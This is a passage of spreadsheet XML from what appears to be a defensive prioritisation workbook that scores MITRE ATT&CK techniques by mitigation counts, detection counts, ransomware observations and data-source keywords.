        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L115">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M115" s="25">
        <v>0</v>
      </c>
      <c r="N115" s="51">
        <v>0</v>
      </c>
      <c r="O115" s="51">
        <v>0</v>
      </c>
      <c r="P115" s="51">
        <v>5</v>
      </c>
      <c r="Q115" s="51">
        <v>6</v>
      </c>
      <c r="R115" s="52" t="s">
        <v>542</v>
      </c>
      <c r="S115" s="51">
        <v>19</v>
      </c>
      <c r="T115" s="52" t="s">
        <v>543</v>
      </c>
      <c r="U115" s="51">
        <v>33</v>
      </c>
      <c r="V115" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.54761904761904767</v>
      </c>
      <c r="W115">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>52</v>
      </c>
      <c r="X115">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.94545454545454544</v>
      </c>
      <c r="Y115">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.94545454545454544</v>
      </c>
      <c r="Z115">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>11</v>
      </c>
      <c r="AA115">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.11</v>
      </c>
      <c r="AB115">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.11</v>
      </c>
      <c r="AC115" s="29" t="s">
        <v>544</v>
      </c>
      <c r="AD115" s="25" t="str" cm="1">
        <f t="array" ref="AD115">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC115)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE115" s="25">
        <f>IF(AD115="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF115" s="25" t="str" cm="1">
        <f t="array" ref="AF115">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC115)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG115" s="25">
        <f>IF(AF115="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH115" s="25" t="str" cm="1">
        <f t="array" ref="AH115">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC115)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI115" s="25">
        <f>IF(AH115="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ115" s="25" t="str" cm="1">
        <f t="array" ref="AJ115">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC115)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK115" s="25">
        <f>IF(AJ115="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL115" s="25" t="str" cm="1">
        <f t="array" ref="AL115">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC115)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AM115" s="25">
        <f>IF(AL115="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN115" s="52">
        <v>0</v>
      </c>
      <c r="AO115" s="51">
        <v>0</v>
      </c>
      <c r="AP115" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>7.7584761904761906E-2</v>
      </c>
      <c r="AQ115" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.25861587301587302</v>
      </c>
      <c r="AR115" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.25861587301587302</v>
      </c>
      <c r="AS115" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT115" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU11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16" spans="1:47">
      <c r="A116" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.21883333333333332</v>
      </c>
      <c r="B116" s="25">
        <f>SUM(H116,M116,V116)*(1+SUM(AE116,AG116,AI116,AK116,AM116))</f>
        <v>0.85499999999999998</v>
      </c>
      <c r="C116" s="25" t="s">
        <v>545</v>
      </c>
      <c r="D116" s="25" t="s">
        <v>170</v>
      </c>
      <c r="E116" s="25" t="s">
        <v>546</v>
      </c>
      <c r="F116" s="51">
        <v>1</v>
      </c>
      <c r="G116" s="51">
        <v>1</v>
      </c>
      <c r="H116" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I116">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J116">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K116">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L116">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M116" s="25">
        <v>0</v>
      </c>
      <c r="N116" s="51">
        <v>3</v>
      </c>
      <c r="O116" s="51">
        <v>41</v>
      </c>
      <c r="P116" s="51">
        <v>10</v>
      </c>
      <c r="Q116" s="51">
        <v>10</v>
      </c>
      <c r="R116" s="52" t="s">
        <v>547</v>
      </c>
      <c r="S116" s="51">
        <v>13</v>
      </c>
      <c r="T116" s="52" t="s">
        <v>548</v>
      </c>
      <c r="U116" s="51">
        <v>12</v>
      </c>
      <c r="V116" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.54285714285714282</v>
      </c>
      <c r="W116">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>25</v>
      </c>
      <c r="X116">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.45454545454545453</v>
      </c>
      <c r="Y116">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.45454545454545453</v>
      </c>
      <c r="Z116">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>64</v>
      </c>
      <c r="AA116">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.64</v>
      </c>
      <c r="AB116">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.64</v>
      </c>
      <c r="AC116" s="29" t="s">
        <v>399</v>
      </c>
      <c r="AD116" s="25" t="str" cm="1">
        <f t="array" ref="AD116">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC116)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE116" s="25">
        <f>IF(AD116="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF116" s="25" t="str" cm="1">
        <f t="array" ref="AF116">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC116)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG116" s="25">
        <f>IF(AF116="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH116" s="25" t="str" cm="1">
        <f t="array" ref="AH116">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC116)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI116" s="25">
        <f>IF(AH116="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ116" s="25" t="str" cm="1">
        <f t="array" ref="AJ116">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC116)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK116" s="25">
        <f>IF(AJ116="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL116" s="25" t="str" cm="1">
        <f t="array" ref="AL116">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC116)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM116" s="25">
        <f>IF(AL116="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN116" s="60">
        <v>4</v>
      </c>
      <c r="AO116" s="51">
        <v>1</v>
      </c>
      <c r="AP116" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.21883333333333332</v>
      </c>
      <c r="AQ116" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.28499999999999998</v>
      </c>
      <c r="AR116" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.28499999999999998</v>
      </c>
      <c r="AS116" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.19047619047619047</v>
      </c>
      <c r="AT116" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.19047619047619047</v>
      </c>
      <c r="AU11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17" spans="1:47" ht="48">
      <c r="A117" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.25090000000000001</v>
      </c>
      <c r="B117" s="25">
        <f>SUM(H117,M117,V117)*(1+SUM(AE117,AG117,AI117,AK117,AM117))</f>
        <v>0.84233333333333338</v>
      </c>
      <c r="C117" s="25" t="s">
        <v>549</v>
      </c>
      <c r="D117" s="25" t="s">
        <v>165</v>
      </c>
      <c r="E117" s="25" t="s">
        <v>550</v>
      </c>
      <c r="F117" s="51">
        <v>1</v>
      </c>
      <c r="G117" s="51">
        <v>1</v>
      </c>
      <c r="H117" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I117">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J117">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K117">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L117">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M117" s="25">
        <v>0</v>
      </c>
      <c r="N117" s="51">
        <v>3</v>
      </c>
      <c r="O117" s="51">
        <v>8</v>
      </c>
      <c r="P117" s="51">
        <v>0</v>
      </c>
      <c r="Q117" s="51">
        <v>5</v>
      </c>
      <c r="R117" s="53" t="s">
        <v>551</v>
      </c>
      <c r="S117" s="51">
        <v>24</v>
      </c>
      <c r="T117" s="54" t="s">
        <v>552</v>
      </c>
      <c r="U117" s="51">
        <v>24</v>
      </c>
      <c r="V117" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.53333333333333333</v>
      </c>
      <c r="W117">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>48</v>
      </c>
      <c r="X117">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.87272727272727268</v>
      </c>
      <c r="Y117">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.87272727272727268</v>
      </c>
      <c r="Z117">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>16</v>
      </c>
      <c r="AA117">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.16</v>
      </c>
      <c r="AB117">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.16</v>
      </c>
      <c r="AC117" s="29" t="s">
        <v>553</v>
      </c>
      <c r="AD117" s="25" t="str" cm="1">
        <f t="array" ref="AD117">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC117)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE117" s="25">
        <f>IF(AD117="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF117" s="25" t="str" cm="1">
        <f t="array" ref="AF117">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC117)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG117" s="25">
        <f>IF(AF117="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH117" s="25" t="str" cm="1">
        <f t="array" ref="AH117">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC117)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI117" s="25">
        <f>IF(AH117="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ117" s="25" t="str" cm="1">
        <f t="array" ref="AJ117">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC117)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK117" s="25">
        <f>IF(AJ117="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL117" s="25" t="str" cm="1">
        <f t="array" ref="AL117">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC117)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM117" s="25">
        <f>IF(AL117="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN117" s="59">
        <v>5</v>
      </c>
      <c r="AO117" s="51">
        <v>1</v>
      </c>
      <c r="AP117" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.25090000000000001</v>
      </c>
      <c r="AQ117" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.28077777777777779</v>
      </c>
      <c r="AR117" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.28077777777777779</v>
      </c>
      <c r="AS117" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.23809523809523808</v>
      </c>
      <c r="AT117" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.23809523809523808</v>
      </c>
      <c r="AU11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18" spans="1:47" ht="63.95">
      <c r="A118" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.14963333333333334</v>
      </c>
      <c r="B118" s="25">
        <f>SUM(H118,M118,V118)*(1+SUM(AE118,AG118,AI118,AK118,AM118))</f>
        <v>0.82966666666666666</v>
      </c>
      <c r="C118" s="25" t="s">
        <v>554</v>
      </c>
      <c r="D118" s="25" t="s">
        <v>165</v>
      </c>
      <c r="E118" s="25" t="s">
        <v>555</v>
      </c>
      <c r="F118" s="51">
        <v>1</v>
      </c>
      <c r="G118" s="51">
        <v>1</v>
      </c>
      <c r="H118" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I118">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J118">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K118">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L118">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M118" s="25">
        <v>0</v>
      </c>
      <c r="N118" s="51">
        <v>5</v>
      </c>
      <c r="O118" s="51">
        <v>29</v>
      </c>
      <c r="P118" s="51">
        <v>5</v>
      </c>
      <c r="Q118" s="51">
        <v>7</v>
      </c>
      <c r="R118" s="53" t="s">
        <v>556</v>
      </c>
      <c r="S118" s="51">
        <v>16</v>
      </c>
      <c r="T118" s="51" t="s">
        <v>557</v>
      </c>
      <c r="U118" s="51">
        <v>16</v>
      </c>
      <c r="V118" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.52380952380952384</v>
      </c>
      <c r="W118">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>32</v>
      </c>
      <c r="X118">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.58181818181818179</v>
      </c>
      <c r="Y118">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.58181818181818179</v>
      </c>
      <c r="Z118">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>46</v>
      </c>
      <c r="AA118">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.46</v>
      </c>
      <c r="AB118">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.46</v>
      </c>
      <c r="AC118" s="29" t="s">
        <v>558</v>
      </c>
      <c r="AD118" s="25" t="str" cm="1">
        <f t="array" ref="AD118">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC118)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE118" s="25">
        <f>IF(AD118="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF118" s="25" t="str" cm="1">
        <f t="array" ref="AF118">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC118)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG118" s="25">
        <f>IF(AF118="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH118" s="25" t="str" cm="1">
        <f t="array" ref="AH118">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC118)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI118" s="25">
        <f>IF(AH118="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ118" s="25" t="str" cm="1">
        <f t="array" ref="AJ118">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC118)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK118" s="25">
        <f>IF(AJ118="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL118" s="25" t="str" cm="1">
        <f t="array" ref="AL118">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC118)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM118" s="25">
        <f>IF(AL118="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN118" s="58">
        <v>2</v>
      </c>
      <c r="AO118" s="51">
        <v>1</v>
      </c>
      <c r="AP118" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.14963333333333334</v>
      </c>
      <c r="AQ118" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.27655555555555555</v>
      </c>
      <c r="AR118" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.27655555555555555</v>
      </c>
      <c r="AS118" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT118" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU11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19" spans="1:47" ht="32.1">
      <c r="A119" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.10489999999999999</v>
      </c>
      <c r="B119" s="25">
        <f>SUM(H119,M119,V119)*(1+SUM(AE119,AG119,AI119,AK119,AM119))</f>
        <v>0.71566666666666667</v>
      </c>
      <c r="C119" s="25" t="s">
        <v>559</v>
      </c>
      <c r="D119" s="25" t="s">
        <v>197</v>
      </c>
      <c r="E119" s="25" t="s">
        <v>560</v>
      </c>
      <c r="F119" s="51">
        <v>1</v>
      </c>
      <c r="G119" s="51">
        <v>1</v>
      </c>
      <c r="H119" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I119">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J119">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K119">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L119">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M119" s="25">
        <v>0</v>
      </c>
      <c r="N119" s="51">
        <v>1</v>
      </c>
      <c r="O119" s="51">
        <v>23</v>
      </c>
      <c r="P119" s="51">
        <v>0</v>
      </c>
      <c r="Q119" s="51">
        <v>8</v>
      </c>
      <c r="R119" s="51" t="s">
        <v>561</v>
      </c>
      <c r="S119" s="51">
        <v>15</v>
      </c>
      <c r="T119" s="51" t="s">
        <v>562</v>
      </c>
      <c r="U119" s="51">
        <v>15</v>
      </c>
      <c r="V119" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.43809523809523809</v>
      </c>
      <c r="W119">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>30</v>
      </c>
      <c r="X119">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.54545454545454541</v>
      </c>
      <c r="Y119">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.54545454545454541</v>
      </c>
      <c r="Z119">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>32</v>
      </c>
      <c r="AA119">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.32</v>
      </c>
      <c r="AB119">
